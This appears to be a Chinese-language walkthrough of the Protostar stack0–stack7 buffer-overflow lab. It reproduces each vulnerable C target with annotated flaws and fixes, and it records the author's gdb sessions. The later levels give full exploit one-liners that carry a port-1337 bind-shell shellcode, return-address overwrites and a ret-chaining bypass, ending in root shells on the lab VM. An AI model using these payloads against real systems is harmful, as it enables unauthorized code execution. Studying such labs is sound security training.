#include
#include
#include
/*
 * Protostar stack0 target, reproduced verbatim: the offsets and addresses in
 * the writeup below depend on this exact frame layout, so the code is left
 * as-is and only annotated.
 *
 * Vulnerability: gets() reads an unbounded line into the 64-byte `buffer`,
 * so longer input overwrites what the compiler placed next to it on the
 * stack -- here the `modified` local that the program then tests (the
 * transcript below flips it with a 68-byte line).
 * Mitigation: gets() was removed from the language in C11; a bounded read
 * such as fgets(buffer, sizeof buffer, stdin) does not overflow.
 */
int main(int argc, char **argv)
{
volatile int modified;   /* volatile: presumably so the compiler cannot assume it stays 0 after gets() */
char buffer[64];
modified = 0;
gets(buffer);            /* unbounded read: the overflow sink */
if(modified != 0) {
printf("you have changed the 'modified' variable\n");
} else {
printf("Try again?\n");
}
}
思路:buffer溢出改变modified的值
$ echo `python -c "print 'A'*68"` | /opt/protostar/bin/stack0
you have changed the 'modified' variable
#include
#include
#include
#include
/*
 * Protostar stack1 target, reproduced verbatim (see stack0 above for why
 * the layout must not change).
 *
 * Vulnerability: strcpy() copies argv[1] into the 64-byte `buffer` with no
 * length check, so a longer argument overwrites the adjacent `modified`.
 * The expected value 0x61626364 is the ASCII bytes "abcd"; on the
 * little-endian i386 build the payload has to supply them reversed.
 * Mitigation: a bounded copy, e.g. snprintf(buffer, sizeof buffer, "%s", argv[1]),
 * or rejecting arguments longer than the buffer.
 */
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
if(argc == 1) {
errx(1, "please specify an argument\n");   /* errx() exits, so argv[1] exists below */
}
modified = 0;
strcpy(buffer, argv[1]);   /* unbounded copy of attacker-controlled input: the overflow sink */
if(modified == 0x61626364) {
printf("you have correctly got the variable to the right value\n");
} else {
printf("Try again, you got 0x%08x\n", modified);
}
}
思路:buffer溢出改变modified的值为0x61626364
$ /opt/protostar/bin/stack1 `python -c "print 'A'*64+'\x64\x63\x62\x61'"`
you have correctly got the variable to the right value
#include
#include
#include
#include
/*
 * Protostar stack2 target, reproduced verbatim (see stack0 above for why
 * the layout must not change).
 *
 * Vulnerability: the same unbounded strcpy() as stack1, but the source is
 * the GREENIE environment variable. Environment variables are input the
 * caller controls, so they need the same length validation as argv.
 * The expected value 0x0d0a0d0a is the byte sequence CR LF CR LF; the
 * writeup below shows why those bytes are awkward to set from a shell.
 * Mitigation: bounded copy (snprintf with sizeof buffer) or length check
 * before copying.
 */
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
char *variable;
variable = getenv("GREENIE");
if(variable == NULL) {
errx(1, "please set the GREENIE environment variable\n");   /* errx() exits */
}
modified = 0;
strcpy(buffer, variable);   /* unbounded copy of environment data: the overflow sink */
if(modified == 0x0d0a0d0a) {
printf("you have correctly modified the variable\n");
} else {
printf("Try again, you got 0x%08x\n", modified);
}
}
思路:buffer溢出改变modified的值为0x0d0a0d0a,而buffer是从环境变量GREENIE复制过来的,所以设置一下该环境变量就好。
$ export GREENIE=`python -c "print 'A'*64+'\x0a\x0d\x0a\x0d'"`
$ ./stack2
you have correctly modified the variable
这是在自己本地的Ubuntu 16.04下的执行结果
但在protostar虚拟机里,执行失败
$ export GREENIE=`python -c "print 'A'*64+'\x0a\x0d\x0a\x0d'"`
: bad variable name
不给设置这样的变量名
不服,写个脚本试试
import os

# Set GREENIE from inside the process instead of via `export`: the shell on
# the protostar VM rejects this value (": bad variable name" in the writeup,
# presumably because it word-splits the substituted string at the embedded
# newline), whereas os.environ hands the bytes to the child unchanged.
PAYLOAD = 'A' * 64 + '\x0a\x0d\x0a\x0d'
os.environ['GREENIE'] = PAYLOAD
os.system('./stack2')
$ python se.py
you have correctly modified the variable
OK
#include
#include
#include
#include
/* Win target for the stack3 exercise. Nothing in the program's own control
 * flow calls it; reaching it proves the function pointer in main() was
 * redirected. Its address is what the writeup recovers from the disassembly. */
void win()
{
puts("code flow successfully changed");
}
/*
 * Protostar stack3 target, reproduced verbatim (see stack0 above for why
 * the layout must not change).
 *
 * Vulnerability: gets() overflows the 64-byte `buffer` into the adjacent
 * function pointer `fp`; any non-zero value is then called, so the input
 * chooses the next instruction address (control-flow hijack). The checksec
 * output below shows no NX, no PIE and no canary, so nothing in the binary
 * or loader constrains that choice.
 * Mitigation: bounded input, plus building with stack protector, PIE and
 * RELRO so that a corrupted pointer is detected or hard to aim.
 */
int main(int argc, char **argv)
{
volatile int (*fp)();   /* local function pointer living next to buffer */
char buffer[64];
fp = 0;
gets(buffer);           /* unbounded read: the overflow sink */
if(fp) {
/* %x with a pointer argument is a format/argument mismatch (UB); %p is the matching conversion */
printf("calling function pointer, jumping to 0x%08x\n", fp);
fp();                   /* indirect call through attacker-controlled pointer */
}
}
思路:查安全机制
$ checksec stack3
[*] '/home/jc/pwn/stack3'
Arch: i386-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
什么都没开,那么只需要反汇编看一下win的地址,利用buffer溢出就好
$ gdb -q stack3
Reading symbols from stack3...done.
gdb-peda$ disassemble win
Dump of assembler code for function win:
0x08048424 <+0>: push ebp
0x08048425 <+1>: mov ebp,esp
0x08048427 <+3>: sub esp,0x18
0x0804842a <+6>: mov DWORD PTR [esp],0x8048540
0x08048431 <+13>: call 0x8048360 <puts@plt>
0x08048436 <+18>: leave
0x08048437 <+19>: ret
End of assembler dump.
找到win()的地址为0x08048424,编写payload过关
$ echo `python -c "print 'A'*64+'\x24\x84\x04\x08'"` | /opt/protostar/bin/stack3
calling function pointer, jumping to 0x08048424
code flow successfully changed
#include
#include
#include
#include
/* Win target for the stack4 exercise: unreachable through the program's own
 * control flow, so printing this line shows the saved return address of
 * main() was overwritten with win's address. */
void win()
{
puts("code flow successfully changed");
}
/*
 * Protostar stack4 target, reproduced verbatim (see stack0 above for why
 * the layout must not change).
 *
 * Vulnerability: with no other local to absorb it, the gets() overflow
 * runs past the frame into the saved return address of main() (the writeup
 * below finds it at offset 76), so the function returns wherever the input
 * says. Falling off the end of main() without a return is well-defined
 * (returns 0) and is not the issue.
 * Mitigation: bounded read; a stack canary would abort before the corrupted
 * return address is used.
 */
int main(int argc, char **argv)
{
char buffer[64];
gets(buffer);   /* unbounded read: overwrites the saved return address */
}
代码真简洁!
思路:溢出buffer,造成崩溃,找到rip被覆盖的偏移量,放入win()的地址
$ gdb -q stack4
Reading symbols from stack4...done.
gdb-peda$ pattern_create 138
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAA'
gdb-peda$ r
Starting program: /home/jc/pwn/stack4
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAA
Program received signal SIGSEGV, Segmentation fault.
EIP: 0x41344141 ('AA4A')
gdb-peda$ pattern_offset AA4A
AA4A found at offset: 76
覆盖eip的偏移量为76
gdb-peda$ p win
$3 = {void (void)} 0x80483f4 <win>
win()的地址为0x80483f4
$ echo `python -c "print 'A'*76+'\xf4\x83\x04\x08'"` | /opt/protostar/bin/stack4
code flow successfully changed
Segmentation fault
#include
#include
#include
#include
/*
 * Protostar stack5 target, reproduced verbatim (see stack0 above for why
 * the layout must not change).
 *
 * Same code as stack4, but without a win() function: the overflow again
 * overwrites the saved return address, and because the checksec output
 * below shows NX disabled, the stack itself is executable. That is the
 * property that makes injected code runnable here; with NX enabled the
 * same overflow would fault instead.
 * Mitigation: bounded read, NX (non-executable stack), stack canary, ASLR.
 */
int main(int argc, char **argv)
{
char buffer[64];
gets(buffer);   /* unbounded read: overwrites the saved return address */
}
思路:检查安全机制
$ checksec stack5
[*] '/home/jc/pwn/stack5'
Arch: i386-32-little
RELRO: No RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
什么也没开,所以,应该可以控制eip,执行shellcode。找到一个shell_bind_tcp的shellcode,共89字节,端口号为1337。
生成长度为200的测试字符串
$ gdb -q stack5
Reading symbols from stack5...done.
gdb-peda$ pattern_create 200
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'
运行
gdb-peda$ r
Starting program: /home/jc/pwn/stack5
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
ESP: 0xffffcec0 ("AJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
EIP: 0x41344141 ('AA4A')
eip崩溃在0x41344141(‘AA4A’)
gdb-peda$ pattern_offset AA4A
AA4A found at offset: 76
偏移量为76
此时esp的地址为0xffffcec0,也是我们控制eip要转到的地址,内容为
AJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
长度为120,可以容纳89字节的shellcode,还可以在shellcode前执行一段nop指令。构造payload:'A'*76+shellcode地址+shellcode
echo `python -c "print 'A'*76+'\xc0\xce\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack5
Segmentation fault (core dumped)
Segmentation fault!查看core
gdb -q stack5 core
Reading symbols from stack5...done.
[New LWP 17461]
Core was generated by `./stack5'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0xffffceff in ?? ()
查看0xffffceff附近的存储情况
gdb-peda$ x/20b 0xffffceff
0xffffceff: 0xff 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xffffcf07: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xffffcf0f: 0x90 0x6a 0x66 0x58
我们的shellcode的起始地址是0xffffcf00,而不是0xffffcec0,修改payload
echo `python -c "print 'A'*76+'\x00\xcf\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack5
Segmentation fault (core dumped)
还是Segmentation fault!再查看core
$ gdb -q stack5 core
Reading symbols from stack5...done.
[New LWP 17571]
Core was generated by `./stack5'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0x90ffffcf in ?? ()
查看附近内存
gdb-peda$ x/20b 0xffffcf00
0xffffcf00: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xffffcf08: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x6a
0xffffcf10: 0x66 0x58 0x6a 0x1
gdb-peda$ x/20b 0xffffcef8
0xffffcef8: 0x41 0x41 0x41 0x41 0xcf 0xff 0xff 0x90
0xffffcf00: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xffffcf08: 0x90 0x90 0x90 0x90
发现我们设置的返回地址0xffffcf00中的\x00字节不在内存中,悟了!\x00字节发送不了!但是我设了16个字节的nop,返回地址往后移1到16位都行,对吧?就移1位好了,修改返回地址为0xffffcf01
echo `python -c "print 'A'*76+'\x01\xcf\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack5
$ nc localhost 1337
whoami
jc
成功!
protostar虚拟机里的esp的地址:0xbffffcc0
$ echo `python -c "print 'A'*76+'\xc0\xfc\xff\xbf'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | /opt/protostar/bin/stack5
$ nc protostar 1337
whoami
root
protostar虚拟机里没有发现gdb与直接运行时esp不一致的问题
#include
#include
#include
#include
/*
 * Protostar stack6 target, reproduced verbatim (see stack0 above for why
 * the layout must not change).
 *
 * Reads a line with gets() and then refuses to return if its own return
 * address has top byte 0xbf (the stack region on the protostar VM, see the
 * ESP value quoted in the writeup). The check only inspects the immediate
 * return target; it says nothing about where that target transfers control
 * next, which is the gap the writeup's solution uses. A return-address
 * filter is therefore not a substitute for a bounded read.
 *
 * Other defects worth noting:
 *  - `ret` is written AFTER gets(), so the local itself is stored into the
 *    already-overflowed frame. NOTE(review): in the memory dump below the
 *    value 0x080484f9 shows up at buffer+64, which looks like this store
 *    and would explain the four overwritten 'A's the author asks about --
 *    to be confirmed against the frame layout.
 *  - __builtin_return_address() yields a pointer; assigning it to an
 *    unsigned int without a cast is an implicit pointer-to-integer
 *    conversion (fits on 32-bit, still a constraint violation).
 *  - printf("%p") is given an unsigned int, not a pointer: format mismatch.
 *  - _exit() skips stdio flushing; the prompt was flushed explicitly above.
 */
void getpath()
{
char buffer[64];
unsigned int ret;
printf("input path please: "); fflush(stdout);
gets(buffer);   /* unbounded read: the overflow sink */
ret = __builtin_return_address(0);   /* pointer stored into an unsigned int, after the overflow */
if((ret & 0xbf000000) == 0xbf000000) {   /* rejects only return targets whose top byte is 0xbf */
printf("bzzzt (%p)\n", ret);   /* %p expects a pointer argument */
_exit(1);
}
printf("got path %s\n", buffer);
}
/* Entry point for stack6: all input handling, and the overflow, happens in
 * getpath(); main() keeps no locals of its own. */
int main(int argc, char **argv)
{
getpath();
}
返回地址被限制不能在栈中我们可操作的部分
思路:虽然被限制了,但只是限制了getpath函数的返回地址不能直接返回到shellcode的地址,可以控制指令重新返回到getpath的ret指令的地址,此时只要在栈顶设置好shellcode的地址,就可以绕过限制
$ gdb -q stack6
Reading symbols from stack6...done.
gdb-peda$ pattern_create 200
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'
gdb-peda$ r
Starting program: /home/jc/pwn/stack6
input path please: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
got path AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAJAAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
ESP: 0xffffceb0 ("fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
EIP: 0x41414a41 ('AJAA')
gdb-peda$ pattern_offset AJAA
AJAA found at offset: 80
这次getpath()的返回地址偏移量为80
gdb-peda$ x/s $esp
0xffffceb0: "fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"
gdb-peda$ pattern_offset fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
fAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA found at offset: 84
栈指针地址为0xffffceb0,偏移量为84
构造payload:'A'*80+ret指令地址+ret返回地址(shellcode地址,esp+4)+shellcode
$ echo `python -c "print 'A'*80+'\xf9\x84\x04\x08'+'\xb4\xce\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA����������������������jfXj[1�VSj��̀_���fVfh9fS��jQW��̀�f�VW��̀�fCVVW��̀YY���?̀Iy��
h//shh/bin��A��̀
Segmentation fault (core dumped)
Segmentation fault!查看core文件
$ gdb -q stack6 core
Reading symbols from stack6...done.
[New LWP 14242]
Core was generated by `./stack6'.
Program terminated with signal SIGSEGV, Segmentation fault.
#0 0xffffcebd in ?? ()
查一下附近的存储情况
gdb-peda$ x/100b 0xffffce78
0xffffce78: 0x00 0x70 0xfb 0xf7 0x41 0x41 0x41 0x41
0xffffce80: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffce88: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffce90: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffce98: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffcea0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffcea8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffceb0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffceb8: 0x41 0x41 0x41 0x41 0xf9 0x84 0x04 0x08
0xffffcec0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xffffcec8: 0x41 0x41 0x41 0x41 0xf9 0x84 0x04 0x08
0xffffced0: 0xb4 0xce 0xff 0xff 0x90 0x90 0x90 0x90
0xffffced8: 0x90 0x90 0x90 0x90
gdb-peda$ p $esp
$2 = (void *) 0xffffced4
发现问题了:我们第二次的返回地址应该是0xffffced4,而不是0xffffceb4
而且在连续存储64个A之后,出现了有4个A被替换的情况,此处不解,路过的friend懂的希望不吝赐教
修改payload
$ echo `python -c "print 'A'*80+'\xf9\x84\x04\x08'+'\xd4\xce\xff\xff'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | ./stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA����������������������jfXj[1�VSj��̀_���fVfh9fS��jQW��̀�f�VW��̀�fCVVW��̀YY���?̀Iy��
h//shh/bin��A��̀
$ nc localhost 1337
whoami
jc
上面是在本机Ubuntu上折腾的结果。在protostar的虚拟机上,同样栈指针的地址要加32个字节。获得的esp地址是0xbffffd20,本来+4就是0xbffffd24,但是要再加32个字节变成0xbffffd44才是正解。
$ echo `python -c "print 'A'*80+'\xf9\x84\x04\x08'+'\x44\xfd\xff\xbf'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | /opt/protostar/bin/stack6
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��AAAAAAAAAAAA��D�������������������jfXj[1�VSj��̀_���fVfh9fS��jQW��̀�f�VW��̀�fCVVW��̀YY���?̀Iy��
h//shh/bin��A��̀
$ nc protostar 1337
whoami
root
我尝试了在gdb里执行payload,发现gdb里是不用加32字节的,难道是gdb与系统直接运行的区别?
#include
#include
#include
#include
/*
 * Protostar stack7 target, reproduced verbatim (see stack0 above for why
 * the layout must not change).
 *
 * Same structure as stack6 with a wider filter: the mask 0xb0000000 rejects
 * any return address whose top nibble is 0xb, not just 0xbf. The
 * limitation is unchanged -- only the immediate return target is checked,
 * not where control goes afterwards -- so the writeup solves it the same
 * way. The real fix remains a bounded read.
 *
 * Returns a heap copy of the line (strdup); the caller owns it and must
 * free() it. strdup() can return NULL on allocation failure, which is not
 * checked here.
 * Other defects: see the notes on stack6's getpath() above (pointer stored
 * into unsigned int after the overflow, %p given an integer, _exit()).
 */
char *getpath()
{
char buffer[64];
unsigned int ret;
printf("input path please: "); fflush(stdout);
gets(buffer);   /* unbounded read: the overflow sink */
ret = __builtin_return_address(0);   /* pointer stored into an unsigned int, after the overflow */
if((ret & 0xb0000000) == 0xb0000000) {   /* rejects return targets whose top nibble is 0xb */
printf("bzzzt (%p)\n", ret);   /* %p expects a pointer argument */
_exit(1);
}
printf("got path %s\n", buffer);
return strdup(buffer);   /* heap copy, ownership passes to the caller; NULL on failure */
}
/* Entry point for stack7. The strdup()'d string getpath() returns is
 * discarded, so it is never freed -- harmless here because the process
 * exits right after, but it is a leak in any longer-lived caller. */
int main(int argc, char **argv)
{
getpath();
}
思路:和stack6一样的解法
ret指令的地址:0x08048544
shellcode的起始地址:0xbffffcd4
$ echo `python -c "print 'A'*80+'\x44\x85\x04\x08'+'\xd4\xfc\xff\xbf'+'\x90'*16+'\x6a\x66\x58\x6a\x01\x5b\x31\xf6\x56\x53\x6a\x02\x89\xe1\xcd\x80\x5f\x97\x93\xb0\x66\x56\x66\x68\x05\x39\x66\x53\x89\xe1\x6a\x10\x51\x57\x89\xe1\xcd\x80\xb0\x66\xb3\x04\x56\x57\x89\xe1\xcd\x80\xb0\x66\x43\x56\x56\x57\x89\xe1\xcd\x80\x59\x59\xb1\x02\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x41\x89\xca\xcd\x80'"` | /opt/protostar/bin/stack7
input path please: got path AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD�AAAAAAAAAAAAD���������������������jfXj[1�VSj��̀_���fVfh9fS��jQW��̀�f�VW��̀�fCVVW��̀YY���?̀Iy��
h//shh/bin��A��̀
$ nc protostar 1337
whoami
root
失败不可怕,可怕的是不去找出失败的原因。